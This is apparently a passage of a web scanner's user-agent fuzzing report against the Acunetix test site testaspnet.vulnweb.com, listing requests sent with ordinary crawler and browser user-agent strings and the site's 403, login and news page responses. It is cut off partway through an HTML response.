URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Show / hide Request and Response
Request Header - size: 304 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:28 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Show / hide Request and Response
Request Header - size: 315 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:28 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Show / hide Request and Response
Request Header - size: 368 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:28 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Show / hide Request and Response
Request Header - size: 373 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:28 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/images
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 278 bytes.	GET http://testaspnet.vulnweb.com/images HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:28 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 434 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:32 GMT Content-Length: 13482
Response Body - size: 13,482 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 448 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:33 GMT Content-Length: 22906
Response Body - size: 22,906 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWF